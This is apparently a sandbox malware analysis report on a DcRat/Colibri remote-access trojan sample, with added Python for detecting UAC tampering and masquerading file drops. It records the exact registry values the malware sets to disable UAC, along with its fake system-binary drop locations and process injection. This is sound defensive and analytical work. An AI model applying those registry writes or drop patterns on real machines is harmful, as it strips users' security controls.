Malware Analysis Report

2024-11-30 22:11

Sample ID: 241117-flc37s1lgx
Target: 4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14
SHA256: 4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14
Tags: dcrat evasion execution infostealer rat trojan colibri build1 discovery loader
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

SHA256: 4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14

Threat Level: Known bad

The file 4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14 was found to be: Known bad.

Malicious Activity Summary

dcrat evasion execution infostealer rat trojan colibri build1 discovery loader

Colibri Loader

UAC bypass

Dcrat family

DcRat

Colibri family

Process spawned unexpected child process

DCRat payload

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Checks computer location settings

Checks whether UAC is enabled

Suspicious use of SetThreadContext

Drops file in Windows directory

Drops file in Program Files directory

Unsigned PE

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Suspicious use of WriteProcessMemory

Scheduled Task/Job: Scheduled Task

System policy modification

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-11-17 04:57

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-11-17 04:57
Reported: 2024-11-17 04:59
Platform: win7-20240903-en
Max time kernel: 150s
Max time network: 154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe"

Signatures

DcRat

rat infostealer dcrat

Dcrat family

dcrat

Process spawned unexpected child process

Description Indicator Process Target Count
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe 39

UAC bypass

evasion trojan
Description Indicator Process Target Count
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A 11
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A 11
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A 11
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A 1
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A 1
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A 1
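The three values rewritten above are the UAC policy switches: EnableLUA = 0 turns UAC off at the next reboot, ConsentPromptBehaviorAdmin = 0 lets members of Administrators elevate with no consent or credential prompt, and PromptOnSecureDesktop = 0 moves any remaining prompt off the secure desktop onto the interactive desktop. Writing under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System already requires an elevated token, so these rows show a process that holds administrator rights disabling UAC for later sessions; "UAC bypass" is the sandbox's signature label for that write pattern. The Python below is added here as an example and is not part of the sandbox report or of the DcRat/Colibri tooling: it parses rows in the report's flattened Description/Indicator/Process/Target layout (an optional trailing integer on a row is read as an occurrence count), aggregates writes per value and process, and flags every write that leaves a value outside an assumed hardened baseline. The baseline, the impact strings, and the rows marked as constructed in the code are assumptions made for the example.

```python
import re
from collections import Counter

# UAC policy values under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,
# written as \REGISTRY\MACHINE\... in the sandbox rows. EXPECTED is an assumed baseline
# for this example: UAC on, prompts on the secure desktop, and any admin prompt
# behaviour other than 0 (0 means "elevate without prompting").
UAC_POLICY_KEY = r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
EXPECTED = {
    "EnableLUA": {"1"},
    "ConsentPromptBehaviorAdmin": {"1", "2", "3", "4", "5"},
    "PromptOnSecureDesktop": {"1"},
}
IMPACT = {
    "EnableLUA": "UAC is off entirely after the next reboot",
    "ConsentPromptBehaviorAdmin": "administrators elevate with no consent or credential prompt",
    "PromptOnSecureDesktop": "elevation prompts appear on the interactive desktop, where they can be overlaid",
}

# One regex over the sandbox's flattened "Description Indicator Process Target" rows.
# The process path contains spaces, so it is matched lazily and the target is the
# last whitespace-free token; an optional trailing integer is read as a row count.
ROW = re.compile(
    r'^(?P<desc>Set value \(\w+\)|Key value queried)\s+'
    r'(?P<key>\\REGISTRY\\\S+?)\\(?P<name>\w+)'
    r'(?:\s+=\s+"(?P<value>[^"]*)")?\s+'
    r'(?P<process>.+?)\s+(?P<target>\S+)(?:\s+(?P<count>\d+))?$'
)


def parse_row(row):
    """Fields of one registry row as a dict, or None for any other row."""
    m = ROW.match(row.strip())
    return m.groupdict() if m else None


def analyze(rows):
    """Aggregate UAC policy writes and reads from sandbox rows.

    Returns (findings, reads). findings holds one dict per distinct
    (value name, written value, writing process) whose written value is outside
    EXPECTED, with its occurrence count and plain-English impact; reads counts
    queries of the same values per process."""
    writes, reads = Counter(), Counter()
    for row in rows:
        r = parse_row(row)
        if not r or r["key"] != UAC_POLICY_KEY or r["name"] not in EXPECTED:
            continue
        n = int(r["count"] or 1)
        if r["desc"].startswith("Set value"):
            writes[(r["name"], r["value"], r["process"])] += n
        else:
            reads[(r["name"], r["process"])] += n
    findings = [
        {"value": name, "written": val, "process": proc, "count": n, "impact": IMPACT[name]}
        for (name, val, proc), n in writes.items()
        if val not in EXPECTED[name]
    ]
    return sorted(findings, key=lambda f: (f["process"], f["value"])), reads


def tampering_processes(findings):
    """Distinct image paths that wrote a weakened UAC policy value."""
    return sorted({f["process"] for f in findings})


# Constructed input: rows copied from the report above, plus three rows that are
# not from the report (a row carrying a trailing count of 10, a benign EnableLUA=1
# write, and a write to an unrelated key) to show how each is handled.
POL = UAC_POLICY_KEY
WMIADAP = r"C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe"
SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe"
SAMPLE_ROWS = [
    f'Set value (int) {POL}\\PromptOnSecureDesktop = "0" {WMIADAP} N/A',
    f'Set value (int) {POL}\\PromptOnSecureDesktop = "0" {WMIADAP} N/A',
    f'Set value (int) {POL}\\EnableLUA = "0" {WMIADAP} N/A',
    f'Set value (int) {POL}\\ConsentPromptBehaviorAdmin = "0" {WMIADAP} N/A 10',  # constructed: counted row
    f'Set value (int) {POL}\\EnableLUA = "0" {SAMPLE} N/A',
    f'Key value queried {POL}\\EnableLUA {WMIADAP} N/A',
    f'Key value queried {POL}\\EnableLUA {SAMPLE} N/A',
    f'Set value (int) {POL}\\EnableLUA = "1" C:\\Windows\\System32\\svchost.exe N/A',  # constructed: benign
    f'Set value (int) \\REGISTRY\\MACHINE\\SOFTWARE\\Example\\Unrelated = "0" {WMIADAP} N/A',  # constructed: other key
]

if __name__ == "__main__":
    findings, reads = analyze(SAMPLE_ROWS)
    for f in findings:
        print(f'{f["count"]}x {f["value"]} = {f["written"]} by {f["process"]}: {f["impact"]}')
    print("reads:", dict(reads))
    print("processes tampering with UAC policy:", tampering_processes(findings))
```

On a live host the same baseline can be checked with reg query against HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, and the three value names make a compact filter for Sysmon registry value-set events (Event ID 13) keyed on the writing image path, which is exactly the pairing the table above records.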

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target Count
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A 11
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A 11
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A 1
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A 1

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\wininit.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\24dbde2999530e C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\wininit.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\56085415360792 C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files\VideoLAN\WMIADAP.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files\VideoLAN\75a57c1bdf437c C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\RCXE8BF.tmp C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files (x86)\Windows Portable Devices\c5b4cb5e9653cc C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\WmiPrvSE.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files (x86)\Windows Portable Devices\RCXE199.tmp C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files\Internet Explorer\de-DE\RCXF571.tmp C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files\Internet Explorer\de-DE\sppsvc.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files (x86)\Windows Portable Devices\services.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files (x86)\Windows Portable Devices\services.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files\Internet Explorer\de-DE\sppsvc.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files\Internet Explorer\de-DE\0a1fd5f707cd16 C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\RCXF15A.tmp C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\RCXF35E.tmp C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\75a57c1bdf437c C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\WmiPrvSE.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files\VideoLAN\RCXF775.tmp C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files\VideoLAN\WMIADAP.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
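Every executable in the list above carries the name of a Windows system binary (wininit.exe, services.exe, sppsvc.exe, WmiPrvSE.exe, WMIADAP.exe) but is written into an unrelated Program Files directory, and in each of those directories the report also shows a file named with 14 hexadecimal characters and an RCXnnnn.tmp staging file; the WMIADAP.exe copy under Microsoft SQL Server Compact Edition is the process that later rewrites the UAC policy values. The genuine binaries live only under C:\Windows\System32 (WMIADAP.exe and WmiPrvSE.exe in System32\wbem), so a system-binary name outside the system directories is a strong masquerading indicator on its own. The Python below is added as an example and is not code from the report or from the malware: it parses rows in the report's flattened layout, flags such drops, and records whether the companion-file and staging patterns are present in the same directory. The allow-listed system binary names, the system roots, and the constructed control row are assumptions made for the example; ntpath is used so the Windows paths are handled on any host.

```python
import ntpath
import re
from collections import defaultdict

# Names of Windows binaries that legitimately exist only under %SystemRoot%
# (WMIADAP.exe and WmiPrvSE.exe under System32\wbem). The set and the roots are an
# illustrative assumption; a real deployment would take them from a golden image.
SYSTEM_BINARIES = {
    "wininit.exe", "services.exe", "sppsvc.exe", "wmiprvse.exe", "wmiadap.exe",
    "lsass.exe", "csrss.exe", "smss.exe", "winlogon.exe", "svchost.exe",
}
SYSTEM_ROOTS = (r"c:\windows\system32", r"c:\windows\syswow64", r"c:\windows\winsxs")
# In this report every dropped executable sits beside a file whose name is 14 hex
# characters, and the drops are staged through RCXnnnn.tmp files in the same directory.
COMPANION = re.compile(r"^[0-9a-f]{14}$")
STAGING = re.compile(r"^rcx[0-9a-f]{4}\.tmp$")

# The flattened file rows hold two space-containing paths; the split between the
# dropped file and the writing process is made at the process column's drive letter.
ROW = re.compile(
    r"^(?P<action>File created|File opened for modification)\s+"
    r"(?P<path>[A-Za-z]:\\.*?)\s+(?P<process>[A-Za-z]:\\.*?)\s+(?P<target>\S+)$"
)


def parse_file_row(row):
    """Fields of one file row as a dict, or None for any other row."""
    m = ROW.match(row.strip())
    return m.groupdict() if m else None


def analyze_drops(rows):
    """Flag created files that carry a system-binary name outside the system
    directories, noting whether the same directory also received a hex-named
    companion file or an RCXnnnn.tmp staging file."""
    events = [e for e in (parse_file_row(r) for r in rows) if e]
    siblings = defaultdict(set)            # directory -> lower-cased file names touched there
    for e in events:
        siblings[ntpath.dirname(e["path"]).lower()].add(ntpath.basename(e["path"]).lower())
    findings = []
    for e in events:
        if e["action"] != "File created":
            continue
        name = ntpath.basename(e["path"])
        directory = ntpath.dirname(e["path"]).lower()
        if name.lower() not in SYSTEM_BINARIES or directory.startswith(SYSTEM_ROOTS):
            continue
        here = siblings[directory]
        findings.append({
            "name": name,
            "path": e["path"],
            "process": e["process"],
            "companion": sorted(s for s in here if COMPANION.match(s)),
            "staged_via_tmp": any(STAGING.match(s) for s in here),
        })
    return findings


SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe"


def _row(action, path, process=SAMPLE):
    return f"{action} {path} {process} N/A"


# Constructed input: rows taken from the report above, plus one row that is not
# from the report (vlc.exe, a non-system name) as a control that must not be flagged.
SAMPLE_ROWS = [
    _row("File opened for modification", r"C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\wininit.exe"),
    _row("File created", r"C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\24dbde2999530e"),
    _row("File created", r"C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\wininit.exe"),
    _row("File created", r"C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\56085415360792"),
    _row("File opened for modification", r"C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\RCXE8BF.tmp"),
    _row("File created", r"C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\WmiPrvSE.exe"),
    _row("File created", r"C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe"),
    _row("File opened for modification", r"C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\RCXF15A.tmp"),
    _row("File created", r"C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\75a57c1bdf437c"),
    _row("File created", r"C:\Program Files (x86)\Windows Portable Devices\services.exe"),
    _row("File created", r"C:\Program Files (x86)\Windows Portable Devices\c5b4cb5e9653cc"),
    _row("File created", r"C:\Program Files\VideoLAN\vlc.exe"),  # constructed control
]

if __name__ == "__main__":
    for f in analyze_drops(SAMPLE_ROWS):
        print(f'{f["path"]} (written by {f["process"]}) companion={f["companion"]} staged={f["staged_via_tmp"]}')
```

The name-versus-location check is the part worth porting to endpoint telemetry (Sysmon file-create events carry both the image and the target filename); the companion-file and RCXnnnn.tmp checks are corroborating details specific to this report's drop pattern and should be treated as supporting evidence rather than a standalone rule.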

Enumerates physical storage devices

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target Count
N/A N/A C:\Windows\system32\schtasks.exe N/A 39

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target Count
N/A N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A 9
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A 12
N/A N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A 11

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target Count
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A 1
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A 12
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A 11

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2360 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
